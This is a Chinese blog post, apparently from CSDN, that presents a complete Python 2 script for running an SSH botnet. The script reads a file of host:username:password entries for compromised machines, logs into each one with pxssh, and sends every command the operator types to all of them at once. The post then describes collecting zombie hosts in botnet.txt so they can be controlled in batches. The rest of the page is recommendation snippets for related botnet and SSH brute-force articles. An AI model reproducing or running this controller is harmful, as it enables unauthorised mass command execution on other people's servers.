构建SSH僵尸网络

最新推荐文章于 2024-08-18 08:45:00 发布
最新推荐文章于 2024-08-18 08:45:00 发布
阅读量1k 收藏 2
点赞数 
#!/usr/bin/python  
#coding=utf-8  
import optparse  
from pexpect import pxssh  
import optparse  


#建立一个名为botnet 的全局数组,其中记录了单个client 对象  
botNet=[]  
#定义一个用于存放host的列表以便判断当前host之前是否已经添加进botNet中了  
hosts = []  


'''
#定义一个客户端的类Client,生成Client()类对象的代码。为了构造client 对象,需要主机名、用户名,以及密码或密钥。
同时,这个类还要包含维持与肉机连接所需的方法——connect()、send_command()  
'''
class Client(object):  
    """docstring for Client"""  
    def __init__(self, host, user, password):  
        self.host = host  
        self.user = user  
        self.password = password  
        self.session = self.connect()  
  
    def connect(self):  
        try:  
            s = pxssh.pxssh()  
            s.login(self.host,self.user,self.password)  
            return s  
        except Exception, e:  
            print e  
            print '[-] Error Connecting'  
  
    def send_command(self, cmd):  
        self.session.sendline(cmd)  
        self.session.prompt()  
        return self.session.before  


'''
botnetCommand()函数只要一个参数——要发布的命令。这个函数遍历整个数组,把命令发送到botnet 数组中的每个client 上。
'''  
def botnetCommand(cmd, k):  
    for client in botNet:     
        output=client.send_command(cmd)  
        #若k为True即最后一台主机发起请求后就输出,否则输出会和之前的重复  
        if k:  
            print '[*] Output from '+client.host  
            print '[+] '+output+'\n'  
  
'''
addClient()的方法,它的输入是主机名、用户和密码,并以此实例化一个client 对象,并把它添加到botnet 数组里
'''   
def addClient(host,user,password): 
    if len(hosts) == 0:  
        hosts.append(host)  
        client=Client(host,user,password)  
        botNet.append(client)  
    else:  
        t = True  
        #遍历查看host是否存在hosts列表中,若不存在则进行添加操作  
        for h in hosts:  
            if h == host:  
                t = False  
        if t:  
            hosts.append(host)  
            client=Client(host,user,password)  
            botNet.append(client)  
  
def main():  
    parser=optparse.OptionParser('Usage : ./botNet.py -f <botNet file>')  
    parser.add_option('-f',dest='file',type='string',help='specify botNet file')  
    (options,args)=parser.parse_args()  
    file = options.file  
    if file==None:  
        print parser.usage  
        exit(0)  
      
    #计算文件行数,不能和下面的f用同一个open()否则会出错  
    count = len(open(file,'r').readlines())  
  
    while True:  
        cmd=raw_input("<SSH> ")  
        k = 0  
        f = open(file,'r')  
        for line in f.readlines():  
            line = line.strip('\n')  
            host = line.split(':')[0]  
            user = line.split(':')[1]  
            password = line.split(':')[2]  
  
            k += 1  
  
            #这里需要判断是否到最后一台主机调用函数,因为命令的输出结果会把前面的所有结果都输出从而会出现重复输出的情况  
            if k < count:  
                addClient(host,user,password)  
                #不是最后一台主机请求,则先不输出命令结果  
                botnetCommand(cmd,False)  
            else:  
                addClient(host,user,password)  
                #最后一台主机请求,则可以输出命令结果  
                botnetCommand(cmd,True)  
      
if __name__ =='__main__':  
    main()  
将僵尸主机的信息都保存在一个文件中、以:号将三类信息分割开,从而脚本可以方便地通过读取文件中的僵尸主机信息,同时脚本也实现了批量命令行交互的形式,和之前修改的ssh命令行交互的形式差不多,只是每次输入一条命令所有的僵尸主机都会去执行从而返回命令结果:



用户可以将收集到的ssh僵尸主机都保存在botnet.txt文件中,这样脚本运行起来执行就会十分地方便、实现批量式的操作。


zwlww1
关注
python构建SSH僵尸网络
05-12 250
构建僵尸网络,主要使用的包为pexpect,Pexpect 是一个用来启动子程序并对其进行自动控制的 Python 模块,它可以用来和像 ssh、ftp、passwd、telnet 等命令行程序进行自动交互。 python ssh登录集群 import optparse import pxssh class Client: def init(self, host, user, password):...
Python黑客攻防,构建SSH僵尸网络!黑客也不难撒!
爬遍所有网站
07-24 280
前言 攻击者在达成恶意目的时,通常会使用被黑掉的计算机群。我们称之为僵尸网络”,因为被黑掉的电脑会像僵尸一样执行指令。 为构建僵尸网络,我们必须引入一一个新的概念一类。类的概念是面向编程对象和编程模型的基础。在这一编程模型中,我们会把各个对象和它们所关联的方法一起实例化。在我们的僵尸网络中,每个单独的僵尸或client(客户端)都需要有能连上某台肉机,并把命令发送给肉机的能力。 ...
Python-BYOB建立自己的僵尸网络
08-10
BYOB 是一个开源项目,为安全研究人员和开发者提供一个框架,来构建和运行基本的僵尸网络,以加深他们对每年影响数百万台设备并生成现代僵尸网络的复杂恶意软件的理解,从而提高他们指定应对这些威胁的对策的能力。
Python黑客攻防(十三)构建SSH僵尸网络
qq_43681532的博客
08-02 873
注:本篇文章仅供学习交流,请勿用于非法用途。参考:《Python绝技:运用Python成为顶级黑客》。 前言 攻击者在达成恶意目的时,通常会使用被黑掉的计算机群。我们称之为僵尸网络”,因为被黑掉的电脑会像僵尸一样执行指令。 为构建僵尸网络,我们必须引入一一个新的概念一类。 类的概念是面向编程对象和编程模型的基础。在这一编程模型中,我们会把各个对象和它们所关联的方法一起实例化。 在我们的僵尸网络中,每个单独的僵尸或client(客户端)都需要有能连上某台肉机,并把命令发送给肉机的能力。 代码 # coding
什么是僵尸网络僵尸网络攻击与防范(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Python_paipai的博客
08-18 752
僵尸网络(Botnet)是指采用一种或多种传播手段,将大量主机感染bot程序(僵尸程序)病毒,从而在控制者和被感染主机之间所形成的一个可一对多控制的网络。攻击者通过恶意软件(如僵尸病毒、恶意软件或木马程序)感染计算机或设备,并将其植入恶意代码,使其成为僵尸网络的一部分。一旦设备被感染,攻击者可以远程控制这些设备,形成一个庞大的、具有协作能力的网络
Python-黑客-004 用Python构建一个SSH僵尸网络-02 手动与SSH交互
weixin_30412013的博客
09-08 155
用Python构建一个SSH僵尸网络-02 手动与SSH交互 — 登录SSH服务器端的 root 用户 我的电脑(攻击者)的系统:Ubuntu14.04 ; 用户名: aobosir@ubuntu:~$ 被攻击对象电脑(模拟的SSH服务端)的系统:Ubuntu16.04 ; 用户名:aobo@ubuntu:~$ 这一节,我们来手动的使用 SSH 连接目标电脑。 ...
【Python脚本进阶】2.2、组建一个SSH僵尸网络(终)
07-29 667
【Python脚本进阶】组建僵尸网络
Python 黑客 004 用Python构建一个SSH僵尸网络 01 简介
热门推荐
AoboSir.com
09-08 1万+
用Python构建一个SSH僵尸网络 01 简介一. 构建一个SSH僵尸网络的流程图:Created with Raphaël 2.1.0手动操作,实现通过SSH连接目标服务器(手动)用 Pexpect 与 SSH 交互(自动)用 Pxssh 暴力破解 SSH 密码利用 SSH 中的弱私钥构建 SSH 僵尸网络二. 详细步骤第零步: 准备工作。手动操作,实现通过SSH连接目标服务器(手动) 构建
Python脚本暴力破解SSH口令以及构建僵尸网络(pxssh)
墨鱼菜鸡
11-03 63
目录 暴力破解SSH口令 SSH远端执行命令 构建僵尸网络 环境:Kali Linux python 2.7.13 暴力破解SSH口令 Pxssh是pexpect库的ssh专用脚本,他能用预先写好的 login()、logout() 和 prompt() 等函数直接与SSH进行交互 。对于...
2-用Python搭建一个SSH僵尸网络
Just have fun
07-19 3773
源代码:https://github.com/LToddy/penetrationtestMorris蠕虫有三种攻击方式,其中之一就是用常见的用户名和密码尝试登录RSH(remote shell)服务。 RSH是1998年问世的,它为系统管理员提供了一种很棒(尽管不安全)远程连接一台机器,并能在主机上运行一系列终端命令对它进行管理的方法。后来人们在RSH中增加了一个密钥加密算法,以保护其经
BYOB(建立自己的僵尸网络)-Python开发
05-25
BYOB(建立自己的僵尸网络)有疑问吗? 加入我们的Discord服务器免责声明:此项目应仅用于授权测试或教育目的。 BYOB是一个开放源代码项目,它提供了一个框架,可用于构建自己的僵尸网络入门指南视频教程有疑问吗? 加入我们的Discord服务器免责声明:此项目应仅用于授权测试或教育目的。 BYOB是一个开源项目,它为安全研究人员和开发人员提供了一个框架,以构建和操作基本的僵尸网络,以加深他们对每年感染数百万设备并产生现代僵尸网络的复杂恶意软件的了解,从而提高他们的能力。发展c
僵尸网络 计算机安全
11-16
僵尸网络僵尸网络 计算机安全僵尸网络 计算机安全
僵尸网络的组建
jklbnm12的博客
10-27 2008
无论多么庞大的系统,都是由一个个具体的元素组成的,僵尸网络也不例外。我们在讨论系统的组建时,一般会讨论两个方面——“组成系统的元素都是什么”以及“这些元素是如何相互联系起来的”。对于僵尸网络来说,则分别对应着僵尸网络的节点和控制方式。本节会对这两个方面分别进行介绍。 节点 僵尸网络由大量功能节点共同组成,这些节点可能是普通PC、服务器或者移动设备 这三种节点分别有其各自的特性,下面依次进行介绍。 误区:DDoS攻击都来自PC组成的僵尸网络 “ DDoS攻击都是由僵尸网络发起的”,这几乎是一个安全领域.
PHP僵尸网络,byob--建立自己的僵尸网络
weixin_39751195的博客
03-28 934
BYOB是一个开源项目,为安全研究人员和开发人员提供构建和运行基本僵尸网络的框架,以加深他们对每年感染数百万设备并产生现代僵尸网络的复杂恶意软件的理解,以提高他们的能力,制定应对这些威胁的对策。它旨在允许开发人员轻松实现自己的代码并添加新功能,而无需从头开始编写RAT(远程管理工具)或 C2(命令和控制服务器)。RAT的关键特性是任意代码/文件可以从C2远程加载到内存中并在目标机器上执行,而无需向...
byob--建立自己的僵尸网络
weixin_33881140的博客
10-16 1576
BYOB是一个开源项目,为安全研究人员和开发人员提供构建和运行基本僵尸网络的框架,以加深他们对每年感染数百万设备并产生现代僵尸网络的复杂恶意软件的理解,以提高他们的能力,制定应对这些威胁的对策。 它旨在允许开发人员轻松实现自己的代码并添加新功能,而无需从头开始编写RAT(远程管理工具)或 C2(命令和控制服务器)。 RAT的关键特性是任意代码/文件可以从C2远程加载到内存中并在目标机器上执行,而无...
【Python脚本进阶】2.2、构建一个SSH僵尸网络(上):SSH交互脚本
07-28 730
【Python脚本进阶】SSH僵尸网络
僵尸网络
Transient1984的专栏
11-12 1149
 僵尸网络  Botnet  僵尸网络是指采用一种或多种传播手段,将大量主机感染bot程序(僵尸程序),从而在控制者和被感染主机之间所形成的一个可一对多控制的网络。  在Botnet的概念中有这样几个关键词。“bot程序”是robot的缩写,是指实现恶意控制功能的程序代码;“僵尸计算机”就是被植入bot的计算机;“控制服务器(Control Server)”是指控制和通信的中心服务器,
Python黑客技术:构建攻击工具与网络分析
内容涵盖端口扫描、SSH僵尸网络构建、FTP控制、病毒编写以及漏洞利用等实战技巧。 3. **法庭调查取证**:本章关注数字取证,通过Python实现对个人位置追踪、数据恢复、Windows注册表分析、文档元数据提取、镜像取证...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值